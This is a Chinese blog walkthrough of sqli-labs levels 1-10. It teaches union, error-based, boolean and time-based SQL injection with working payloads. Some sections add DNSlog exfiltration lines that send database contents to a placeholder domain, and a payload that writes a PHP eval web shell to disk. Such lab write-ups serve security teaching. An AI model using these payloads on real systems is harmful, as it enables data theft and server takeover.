sqli-labs-master 过关 1-10 (附解题思路及各注入方法解析)

最新推荐文章于 2024-05-04 13:51:18 发布
最新推荐文章于 2024-05-04 13:51:18 发布
阅读量2.5k 收藏 21
点赞数 6
文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47306547/article/details/119833568
版权

目录

第 1 关

第 2 关

第 3 关

第 4 关

第 5 关 

第 6 关

第 7 关 

第 8 关

第 9 关

第 10 关

第 1 关

                           联合查询注入(UNION query SQL injectio)

利用前提:页面上有显示位
优点:方便,快捷,易于利用
缺点:需要显示位

格式 :SELECT * FROM users WHERE id=1 UNION SELECT 1,2,3 --%20
       SQL注入时默认输出第一行数据 ,保证第一行无数据(前面加-)则可输出第二行 或者用limit函数 

获取所有数据库名:
union select 1,2,group_concat(schema_name)  from information_schema.schemata --%20

获取指定数据库下所有表名:
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = '库名' --%20

获取指定表下所有字段名:
union select 1,2,group_concat(column_name) from information_schema.columns where table_name = '表名' --%20

                                    常用SQL语句

1. SELECT USER(),SYSTEM_USER(),CURRENT_USER(),SESSION_USER();
  -- 当前用户名及对应主机查询 函数值相同 可在特定函数被过滤的情况下用其他函数替换,以达到相同的目的
2. SELECT DATABASE(); -- 当前数据库名查询
3. SELECT VERSION();  -- 版本号查询
4. SELECT @@version;  -- 版本号查询
5. SELECT @@basedir;  -- 数据库根目录
6. SELECT @@datadir;  -- mysql文件存放目录 该目录下1库对应1文件夹,1表对应3文件
7. SELECT @@version_compile_os; -- 操作系统


特殊用法:
SELECT * FROM users /*!22222 where id = 1*/;
	-- 当MySQL当前版本号大于五位数时,注释会失效,此时只输出id=1的内容
SELECT * FROM users /*!88888 where id = 1*/;
	-- 显示所有内容
SELECT VERSION(); -- 查看MySQL当前版本 
    注:5.5.53--55530
                                        常用函数

CONCAT(str1,str2,...)   -- 拼接字符串
SELECT CONCAT('hello','world') ;

CONCAT_WS(连接符,str1,str2,...)  -- 自定义字符连接
SELECT CONCAT_WS('-','hello','world');

GROUP_CONCAT()  -- 把多个结果合并为一组数据输出
SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.`SCHEMATA`;

ASCII('字符')  -- 返回对应字符的ASCII码       
SELECT ASCII('a');
SELECT ASCII('你好');  -- 多字符只会打印第一个字符的ASCII码
  

ORD('a')  -- 返回字符串第一个字符的ASCII码  
SELECT ORD('a');
SELECT ORD('你好');

MID(字符串(str),起始位置(pos),长度(len))  -- 返回指定字符
SELECT MID('hello',2,3);     -- MySQL字符从1开始 其余语法大多从0开始

SUBSTR(str,pos,len)   -- 返回指定字符长度
SUBSTR(str,pos)
SUBSTR(str FROM pos)
SUBSTR(str\nstr FROM pos FOR len)
SELECT SUBSTR('hello',2,3);
SELECT SUBSTR('hello',2);
SELECT SUBSTR('hello' FROM 2);
SELECT SUBSTR('hello' FROM 2 FOR 3);

LENGTH(字符串);   -- 返回字符串字节长度
SELECT LENGTH('hello');
SELECT LENGTH('你好');   -- 汉字3字节

CHAR_LENGTH(字符串);  -- 返回字符串字符长度
SELECT CHAR_LENGTH('hello');
SELECT CHAR_LENGTH('你好');

第 2 关

 第 3 关

第 4 关

第 5 关 

                        报错注入(Error-based SQL injection)

利用前提:在没有回显或回显不可控的情况下(页面上有没有显示位无所谓),但是需要输出SQL语句执行错误信        
         息,例如:mysqli_error()

优点:不需要显示位
缺点:需要输出例如mysqli_error()的报错信息
                                报错注入 之 通过floor报错

1. AND (SELECT COUNT(*) FROM information_schema.`TABLES` GROUP BY CONCAT((payload),FLOOR(RAND(0)*2)));
        

2. AND (SELECT 1 FROM(SELECT COUNT(),CONCAT((SELECT(SELECT(payload)) FROM information_schema.`TABLES` LIMIT 0,1),FLOOR(RAND(0)2))X FROM information_schema.`TABLES` GROUP BY X)a);

注意:查询时用 group_concat()会出问题 尽量换用 limit 语句
     payload:想查询的SQL语句
                            报错注入 之 通过ExtractValue报错
函数解释:
		extractxalue():从目标XML中返回包含查询值的字符串
		extractxalue(XML_document,XPath_string);
		第一个参数:XML_document是string格式,为XML文档对象的名称,文中为Doc
		第二个参数:XPath_string(XPath格式的字符串)
		concat返回结果为连续参数产生的字符串

AND EXTRACTVALUE(1,(CONCAT(0x7e,(payload),0x7e)));
AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT@@version),0x7e));

注意:会从第一个特殊字符开始显示错误
      0x7e:~
      尽量避免 ' " 的使用,用16进制转换  
      函数输出结果最多为32个字符 用字符串截取解决该问题
                               报错注入 之 通过updateXML报错

函数格式:UPDATEXML(xml_target,xpath_expr,new_xml)

注入:AND UPDATEXML(1,(payload),1)

示例:AND UPDATEXML(1,(CONCAT(0x7e,(SELECT USER()),0x7e)),1);

用法:用法与 ExtractValue 类似

第 6 关

第 7 关 

                 bool(布尔)注入 (Boolean-based blind SQL injection)

应用场景:页面上没有显示位,也没有输出SQL语句执行错误信息
		 只能通过页面返回是否正常判断

优点:不需要显示位,不需要出错信息
缺点:速度慢,耗费大量时间

SELECT * FROM users WHERE id=1 AND ASCII(SUBSTR(USER(),1,1)) > ASCII码值(65-122:A-z)
注:采用二分法可大幅提高速率

SELECT * FROM users WHERE id=1 AND USER() REGEXP 'root@';   -- regexp:包含

由于布尔注入速度慢,需要耗费大量时间,故可以采用其他方法,例如DNSlog外带注入

步骤
1. 使用DNSlog获取根目录
   LOAD_FILE(CONCAT('\\\\',(SUBSTR(HEX(@@basedir),1,60)),'.DNSlog网址\abc'))

   也可以使用DNSlog直接获取数据库信息
2. 注入后门
    UNION SELECT '','','<?php @eval($_POST[1]) ?>' INTO DUMPFILE '绝对路径/test.php'
    注意:路径中的 \ 要全部换为 /
3. 用蚁剑连接


注: 
    1. 一般只有root用户有权限使用 load_file 函数
    2. 路径中 \ 变 /  
       原因:\ 默认转义符
    3. 可以把绝对路径转换为16进制 去掉'' 避免字符过滤
    4. MySQL/Date目录下的可以不需要绝对路径
    5. SELECT '写入内容' INTO OUTFILE '绝对路径/test.txt'
              可以16进制               绝对路径 或 以Date为起始的相对路径 此处不能用16进制
                            DNSlog外带注入

    不论是bool型盲注还是时间型盲注,都需要频繁的跑请求才能获取数据库中的值,在现代WAF的防护下
很可能导致IP被ban。我们可以利用内置函数load_file()来完成DNSlog。
    load_file()不仅能加载本地文件,同时也能对诸如 \\www.test.com 这样的URL发起请求。

示例:SELECT LOAD_FILE(CONCAT('\\\\',(SELECT HEX(payload)),'.DNSlog获取的网址\\abc'));
    注意:每次最多取63字节
         DNSlog网址前的 . 必不可少

上文已获知字符串需要使用 ')) 闭合 ,故不再重复

 BurpSuite安装:(28条消息) BurpSuite 2020.8 安装及代理配置_源十三的博客-CSDN博客 

 

 

 第 8 关

 也可以参照第 7 关 使用DNSlog外带等注入 

 第 9 关

 

                 基于时间的注入(延时注入)(Time-based blind SQl injection)

1. Time-based blind SQL injection
2.利用前提:页面没有显示位,也没有输入SQL语句执行错误信息,正确的SQL语句和错误的返回页面都一样,但
           是加入sleep(5)条件后,正确的SQL语句页面返回速度明显慢了5秒,错误的SQL语句立即返回。
3.优点:不需要显示位,不需要报错信息。
4.缺点:速度慢,耗费大量时间
5.用法:IF(Condition,A,B)函数
       当Condition为TRUE时,返回A;否则返回B。     
6.示例:	SELECT * FROM users WHERE id=1 AND IF(ASCII(SUBSTR(USER(),1,1))>65 ,SLEEP(5),1);       

可以结合DNSlog外带注入,可大幅节省时间
SELECT *  FROM users WHERE id='1' AND LOAD_FILE(CONCAT('\\\\',(SUBSTR(HEX(@@basedir),1,60)),'.DNSlog域名\\abc')) --%20

SELECT *  FROM users WHERE id='1' AND IF(ASCII(SUBSTR(USER(),1,1))=114 ,LOAD_FILE(CONCAT('\\\\',(SELECT HEX(USER())),'.DNSlog域名\\abc')),1) --%20

 

第 10 关

后续步骤与第 9 关完全一致 

源十三
关注
  • 6
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中的mysql账号密码进行安装数据库的创建 介绍几个函数:   (1)version():查看数据库版本   (2)user():查看当前用户   (3)database():查看使用的数据库   (4) limit :limit子句来分批获取所有数据   (5)group_concat():一次性获取数据库信息。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs1-10闯关心得与思路
m0_48294281的博客
03-08 6015
sqli-labs 1-11关闯关个人心得,欢迎交流指正。
sqli-labs-master通关
weixin_62621015的博客
02-15 299
sql注入靶场sqli-labs个人通关笔记,本人业余,出于爱好自学,如有错误,请多海涵 : )
sqli-labs-master
08-22
sqli-labs-master是一个练习sql注入的代码环境
Sqli-labs-master 1-4闯关游戏
FourthGuy的博客
09-29 602
Less-1 首先打开到Less-1 根据提示Please input the ID as parameter with numeric value(请输入ID作为带数值的参数) 这里我们用GET方法进行尝试 ?id=1 可以看到返回了用户名及其密码 接着我们让id的值变为2,3,4... id每变一个值,返回的用户名及其密码都会改变 当id=15时页面会发生变化,如下(不同版本的值不一样,不一样也没影响,无伤大雅) 没有返回任何东西,也就是说在当前库中共有14个用户 ...
Sqli-labs-master 5-6闯关游戏
FourthGuy的博客
10-04 402
Less-5 通过盲注(and 1=1 ,and 1=2)来构造sql语句,最终发现构造语句如下 ?id=1’ --+ 这里我们发现并没有返回值,通过构造sql语句爆库也没有任何返回值 所以我们猜测这里可能用报错注入 在进行爆库之前我们要先了解报错注入要用到的函数 updatexml(XML_document,XPath_string,new_value) 第一个参数:XML_document是string格式,为XML文档对象的名称,中文为Doc 第二个参数:XPath_string(XPath格式
sqli-labs-master闯关(1-7闯关
JohnnyG2000的博客
01-08 689
Less-1: ?id=-1' union all select 1,2,3 --+ // 转译 ?id=-1%27%20union%20all%20select%201,2,3%20--+ Less-2: ?id=-1 union all select 1,2,3 // 转译 ?id=-1%20union%20all%20select%201,2,3 Less-3: ?id=-1') union all select 1,2,3 // 转译 ?id=-1%27)%20union%20all%2
Sqli-labs解题一(Page-1-Basic Challenges)
Bird&Bird
01-05 1448
目录Less-1 单引号字符型注入Less-2 整型注入Less-3 Less-1 单引号字符型注入 输入单引号’,页面报错如下 根据报错知道是单引号字符型注入 判断有多少列(ORDER BY 语句用于根据指定的列对结果集进行排序) ?id=1' order by 3 --+ 爆库名 ?id=-1' union select 1,database(),3 --+ 爆表名 ?id=-1' union select 1,group_concat(table_name) ,3 from informat
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sql注入sqli-labs-master)1~10
m0_63028223的博客
10-05 276
利用concat将updatexml函数和group_concat函数的字符传拼接成一条查询语句。可以盲注也可以利用updatexml函数显示错误信息来进行注入。利用group_concat函数查询所有表名。查询user和password字段。和第五关一样将单引号换成双引号。判断表长(以第四张表为例子)查看数据库名和数据库版本。查询users中的列名。查询username字段。也一样单引号和括号闭合。和第一关注入方法一样。
Sqli-labs通关手册【1-30关】
李安北的博客
05-03 7082
1.sql注入的原理 1)sql注入的原因 语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后在运行时直接由使用该语言的计算机执行这些指令。 例如:在与用户交互的程序中,用户的输入拼接到SQL语句中,执行了与原定计划不同的行为,从而产生了SQL注入漏洞。 2)登录案例讲解 主要是万能密码:登录SQL语句:select * from admin where username = ‘用户输入的用户名’
Sqli-labs-master通关解析(持续更新中。。。)
2022年7月6日从博客园https://www.cnblogs.com/hugboy/ 学习记录博客。
05-18 137
大多情况下:SQL注入其实就是构造正确的mysql命令,让网页回显本不应该让我们看到的数据(如用户的账号和密码)。 第一关-联合查询注入 查库 // 查看当前页面在的数据库 ?id=-1' union select 1,2,database();--+ //一个一个的查 ?id=-1' union select 1,2, schema_name from information_...
SQLi-LABS Page-1(Basic Challenges) 解题
qq_51919093的博客
06-11 1018
关于Sqli-labs靶场的搭建,这篇文章只做解题
sqli-labs解题大法1~10
weixin_43733035的博客
01-18 2319
有时在URL注入时,#不能起到注释作用,这时可以用–+来进行注释 sqli-labs/Less-1: 首先,输入/?id=1,发现页面正常。输入/?id=1’页面错误,在’后面加上–+注释之后页面正常,说明sql语句为id=’$id’,现在可以利用单引号闭合与–+注释来进行注入。 利用order by 进行排序来获得字段数,发现/?id=1’ order by 3–+页面正常,/?id=1’ or...
sqli-labs解题大法11~17
weixin_43733035的博客
01-20 850
Less-11: 首先,进去页面之后发现是这样的 随便输入了一个之后发现报错 可以看出来这是用post方法传递的,我试了几次之后发现由单引号闭合,于是用命令admin’ or 1=1#,页面变化 可以看出来有两个显示位,用1=2令页面错误,使用admin’ or 1=2 order by 2#排序页面正常,admin’ or 1=2 order by 3#页面返回错误,所以有两个字段。接下来就可...
MySQL 实战 45 讲』20 - 幻读是什么,幻读有什么问题?
最新发布
Gavinjou大笨象的博客
05-04 1081
3. 当执行 select * from t where d=5 for update 的时候,6 个记录加上了行锁,还同时加了 7 个间隙锁,这样就确保无法再插入新的记录。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值